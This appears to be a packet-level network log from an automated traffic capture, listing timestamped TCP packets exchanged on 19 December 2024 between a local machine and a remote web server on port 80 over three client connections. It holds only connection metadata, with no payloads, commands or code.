Dec 19, 2024 08:52:38.792489052 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.792500019 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.792540073 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.793087006 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.793097973 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.793138027 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.793587923 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.793597937 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.793636084 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.794240952 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.794253111 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.794296980 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.794651985 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.794765949 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.794789076 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.795239925 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.795552969 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.795564890 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.795577049 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.795603037 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.795641899 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.796303988 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.796684980 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.796695948 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.796714067 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.796741962 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.796749115 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.797425032 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.797571898 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.797584057 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.797630072 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.798091888 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.798135042 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.798501015 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.798583984 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.798635006 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.798811913 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.798826933 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.798875093 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.799623013 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.799628973 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.799689054 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.800070047 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.800081015 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.800126076 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.800555944 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.800592899 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.800645113 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.800832987 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.801071882 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.801111937 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.801491976 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.801534891 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.801659107 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.801934004 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.802041054 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.802100897 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.802572012 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.802613020 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.802613020 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.803082943 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.803181887 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.803227901 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.803627014 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.803639889 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.803689957 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.804168940 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.804291010 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.804333925 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.804586887 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.804677963 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.804757118 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.805278063 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.805360079 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.805614948 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.805659056 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.805660963 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.805835009 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.806392908 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.806528091 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.806641102 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.806756020 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.806767941 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.806807041 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.807504892 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.807646036 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.807662010 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.807719946 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.808017969 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.808073997 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.808250904 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.808264971 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.808329105 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.808717012 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.808728933 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.808739901 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.808819056 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.809228897 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.809242010 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.809252977 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.809278965 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.809856892 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.809916019 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.810082912 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.810095072 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.810137987 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.810564041 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.810575008 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.810585976 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.810597897 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.810604095 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.810647011 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.811415911 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.811431885 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.811490059 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.811831951 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.811845064 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.811897039 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.812284946 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.812298059 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.812309027 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.812321901 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.812362909 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.812362909 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.813167095 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.813184977 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.813198090 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.813215971 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.813218117 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.813419104 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.814017057 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.814029932 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.814079046 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.814469099 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.814480066 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.814492941 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.814505100 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.814532995 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.814541101 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.815452099 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.815473080 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.815485954 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.815498114 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.815542936 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.815542936 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.816450119 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.816462994 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.816473007 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.816487074 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.816498041 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.816524029 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.816533089 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.816653967 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.817466974 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.817478895 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.817491055 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.817502975 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.817519903 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.817537069 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.818399906 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.818416119 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.818428040 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.818442106 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.818465948 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.818487883 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.818553925 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.819343090 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.819369078 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.819381952 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.819392920 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.819411039 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.819439888 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.820298910 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.820313931 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.820326090 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.820338964 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.820349932 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.820354939 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.820384026 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.821247101 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.821261883 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.821274996 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.821290016 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.821299076 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.821312904 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.821331024 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.822213888 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.822227955 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.822240114 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.822252035 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.822263956 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.822304964 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.822323084 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.823210001 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.823225021 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.823236942 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.823247910 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.823262930 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.823293924 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.824155092 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.824170113 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.824181080 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.824193001 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.824218988 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.824234962 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.825162888 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.825184107 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.825196028 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.825206995 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.825217962 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.825231075 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.825259924 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.826092005 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.826109886 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.826121092 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.826133966 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.826147079 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.826157093 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.826173067 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.826186895 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.826997995 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.827009916 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.827050924 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.827056885 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.827069998 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.827102900 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.828008890 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.828022957 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.828033924 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.828047037 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.828058004 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.828064919 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.828072071 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.828996897 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.829010010 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.829021931 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.829029083 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.829078913 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.829168081 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.829935074 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.829947948 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.829958916 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.829971075 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.829981089 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.829993010 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.829993010 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.830029011 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.830889940 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.830926895 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.830939054 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.830950022 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.830992937 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.831032038 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.831873894 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.831886053 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.831897020 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.831908941 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.831919909 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.831928015 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.831949949 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.832870007 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.832881927 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.832899094 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.832910061 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.832921028 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.832928896 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.833827019 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.833838940 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.833848000 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.833859921 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.833868027 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.833904028 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.834794998 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.834806919 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.834815979 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.834826946 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.834837914 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.834872007 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.834872007 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.835786104 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.835798979 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.835808992 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.835819960 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.835829973 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.835839033 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.835850000 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.835867882 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.836704016 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.836716890 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.836728096 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.836760044 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.837395906 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.837407112 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.837441921 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.837788105 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.837799072 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.837816000 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.837824106 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.837833881 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.837852001 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.838653088 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.838665009 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.838709116 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.839088917 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.839101076 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.839132071 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.839534044 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.839579105 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.839811087 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.840224981 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.840281010 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.840286970 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.841303110 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.841346979 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.841394901 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.842077971 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.842125893 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.842175007 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.842839956 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.843002081 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.843048096 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.843667984 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.843710899 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.843758106 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.844508886 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.844614983 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.844624043 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.845438004 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.845608950 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.845658064 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.846193075 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.846241951 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.846432924 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.847155094 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.847208023 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.847251892 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.847997904 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.848043919 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.848155022 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.848813057 CET	80	49732	147.45.47.15	192.168.2.4
